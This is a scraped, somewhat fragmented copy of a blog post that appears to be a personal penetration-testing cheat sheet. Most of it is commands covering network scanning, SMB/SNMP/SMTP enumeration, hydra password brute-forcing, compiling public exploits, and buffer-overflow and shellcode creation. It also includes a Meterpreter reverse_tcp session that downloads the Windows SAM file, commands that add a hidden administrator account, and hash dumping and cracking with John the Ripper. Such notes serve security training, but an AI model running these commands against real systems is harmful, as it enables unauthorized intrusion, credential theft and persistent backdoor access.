Professional Documents
Culture Documents
Home
Wallpapers
Tutorials
Downloads
Forum
Links
Donate
www.n1tr0g3n.com/?p=3869
1/12
12/30/12
nmap -PN 192.168.9.200-254 (this will also show open ports for each host)
nmap -A 192.168.9.201 (runs an aggressive scan scan,OS fingerprint, version scan, scripts and traeroute)
www.n1tr0g3n.com/?p=3869
12/30/12
Check hosts for services (nmap/zenmap) For NMAP - nmap -sS 192.168.9.254 (TCP) - nmap -sU 192.168.9.254 (UDP) (Could be better to do this in zenmap and group servers by services)
DNS Lookups/Hostnames
12/30/12
For SNMP snmpenum -t 192.168.0.100 (displays all snmp informations for that server)
For SMTP nc -v <mailserver> 25 - Will give mailserver version. Can also VRFY to find valid usernames/email accounts
- smbserverscan
www.n1tr0g3n.com/?p=3869
4/12
12/30/12
- metasploit auxiliary scanner ./msfconsole show use scanner/smb/version set RHOSTS 192.168.0.1-192.168.0.254 run
For SMB - nmap -sT -p 445 192.168.9.200-254 -oG smb_results.txt (then grep open sessions) (on my machine /root/offsec) ./samrdump.py 192.168.9.201 (results from above)
For SNMP - nmap -sT -p 161 192.168.9.200/254 -oG snmp_results.txt (then grep) - snmpwalk public -v1 192.168.9.201 1 |grep 77.1.2.25 |cut -d -f4
For SMTP (/pentest/enumeration/vrfy) - ./smtp_VRFY.py <mailserver IP> ** NEED TO MAKE THREADED VERY SLOW **
www.n1tr0g3n.com/?p=3869 5/12
Crack Passwords (hydra/THC bruter) (need mil-dict.txt from Milw0rm cracked hashs)
POP3 hydra -l <username> -P mil-dict.txt -f <MAIL SERVER> pop3 -V (may need to use -t 15 to limit concurrent connections)
MS VPN dos2unix words (whatever word list) cat words | thc-pptp-bruter VPN server
12/30/12
Look for known vulnerable services (refer nmap/zenmap output) Check versions of software (by either snmp enumeration or nmap/zenmap) against http://www.milw0rm.com/search.php or http://www.securityfocus.com/vulnerabilities or http://www.exploit-db.com
Some exploits may be written for compilation under Windows, while others for Linux. You can identify the environment by inspecting the headers. cat exploit | grep #include
Windows: process.h, string.h, winbase.h, windows.h, winsock2.h Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h
12/30/12
cat sploitlist.txt | grep -i exploit | cut -d -f1 | xargs grep sys | cut -d : -f1 | sort -u
LINUX
WINDOWS cd /root/.wine/drive_c/MinGW/bin wine gcc -o ability.exe ability.c -lwsock32 wine ability.exe (to run compiled file)
Wireshark Filters
FUZZING STEPS ASH STYLE 1. Determine target application and operating system
www.n1tr0g3n.com/?p=3869 8/12
2. Obtain a copy of the application 3. Analyse the RFC & communication protocols 4. Discover & record crash conditions 5. Analyse crash conditions for exploitation opportunities Things we need to know Which 4 bytes overwrite EIP Do we have enough space in buffer for shellcode Is this shellcode easily accessible in memory Does the application filter out any characters Will we encounter overflow protection mechanisms
(*** HANDY framework3/tools -> nasm_shell.rb => JMP ESP ***) Creating pattern for EIP location - framework3/tools -> pattern_create.rb <length> >> Fuzzing_script (will append to the end of the script) then look in ollydbg for pattern (need to reverse it and convert) - pattern_offset.rb <EIP PATTERN> will show byte offset Creating shellcode (in framework3) ./msfpayload |grep -i shell ./msfpayload o (for options) ./msfpayload c (to create) ** TAKE NOTE OF SHELLCODE SIZE AND ADJUST FINAL BUFFER TO SUIT ** CAN ALSO USE FRAMEWORK2 MSFWEB INTERFACE (super easy)
-p payloads -t test -e exploit MSFCONSOLE sessions -l => list created sessions sessions -i # => interact with specific session number show options search <string> use exploit/ .. set PAYLOAD . exploit
Meterpreter Payloads (p260) payload = windows/meterpreter/reverse_tcp . meterpreter> help (lists all commands) upload <file> c:\\windows download c:\\windows\\repair\\sam /tmp ps (running tasks) execute -f cmd -c (creates a new channel with the cmd shell) interact # (interacts with channel)
Other useful windows commands net user ash my_password /add net localgroup administrators ash /add
Passwords & Hashes Windows SAM => %systemroot%\Repair (pwdump or fgdump p340)
12/30/12
or use framework meterpreter shell => gethashes Linux => /etc/passwd & /etc/shadow
John The Ripper for linux => unshadow passwd & shadow file to another file ./john hashes.txt
Leave a Reply
Your email address will not be published. Required fields are marked * * Name
Website
www.n1tr0g3n.com/?p=3869
11/12
12/30/12
You may use these HTML tags and attributes: < ah r e f = " "t i t l e = " " >< a b b rt i t l e = " " >< a c r o n y mt i t l e = " " >< b >< b l o c k q u o t ec i t e = " " >< c i t e >< c o d e >< d e ld a t e t i m e = " " >
< e m >< i >< qc i t e = " " >< s t r i k e >< s t r o n g >
Post Comment
www.n1tr0g3n.com/?p=3869
12/12